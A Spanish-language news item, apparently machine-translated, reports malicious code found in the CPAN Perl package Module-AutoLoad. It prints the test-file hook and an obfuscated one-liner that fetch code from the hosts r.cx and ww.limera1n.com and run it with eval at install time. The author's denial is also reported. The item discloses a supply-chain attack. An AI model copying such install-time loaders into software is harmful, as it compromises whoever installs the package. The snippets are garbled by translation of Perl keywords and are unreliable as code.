ProHoster > Blog > noticias de internet > Código malicioso detectado en el paquete Module-AutoLoad Perl

Código malicioso detectado en el paquete Module-AutoLoad Perl

En un paquete Perl distribuido a través del directorio CPAN Módulo-Carga automática, diseñado para cargar automáticamente módulos CPAN sobre la marcha, identificado código malicioso. El inserto malicioso fue encontrado en el código de prueba 05_rcx.t, que se envía desde 2011.
Es de destacar que surgieron preguntas sobre la carga de código cuestionable en stackoverflow allá por 2016.

La actividad maliciosa se reduce a un intento de descargar y ejecutar código desde un servidor de terceros (http://r.cx:1/) durante la ejecución de un conjunto de pruebas iniciado al instalar el módulo. Se supone que el código descargado inicialmente del servidor externo no era malicioso, pero ahora la solicitud se redirige al dominio ww.limera1n.com, que proporciona su parte del código para su ejecución.

Para organizar la descarga en un archivo 05_rcx.t Se utiliza el siguiente código:

mi $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
mi $intento = `$^X $prog`;

El código especificado hace que se ejecute el script. ../contrib/RCX.pl, cuyo contenido se reduce a la línea:

utilice lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1″};

Este script se carga confundido usando el servicio Perlobfuscator.com código del host externo r.cx (los códigos de caracteres 82.46.99.88 corresponden al texto "R.cX") y lo ejecuta en el bloque de evaluación.

$ perl -MIO::Socket -e'$b=new IO::Socket::INET 82.46.99.88.":1″; imprimir <$b>;'
eval descomprimir u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}

Después de desempacar, finalmente se ejecuta lo siguiente: código:

print{$b=nuevo IO::Socket::INET"ww.limera1n.com:80″}"GET /iJailBreak
";evalor return advertir$@mientras$b;1

El paquete problemático ya se ha eliminado del repositorio. PAUSAR (Perl Authors Upload Server) y la cuenta del autor del módulo está bloqueada. En este caso, el módulo aún permanece esta disponible en el archivo MetaCPAN y se puede instalar directamente desde MetaCPAN utilizando algunas utilidades como cpanminus. Se observaque el paquete no se distribuyó ampliamente.

interesante para discutir conectado y el autor del módulo, quien negó la información de que se hubiera insertado código malicioso después de que su sitio “r.cx” fuera pirateado y explicó que solo se estaba divirtiendo y usó perlobfuscator.com no para ocultar algo, sino para reducir el tamaño. del código y simplificando su copia a través del portapapeles. La elección del nombre de la función "botstrap" se explica por el hecho de que esta palabra "suena a bot y es más corta que bootstrap". El autor del módulo también aseguró que las manipulaciones identificadas no realizan acciones maliciosas, sino que solo demuestran la carga y ejecución de código a través de TCP.

Fuente: opennet.ru

Añadir un comentario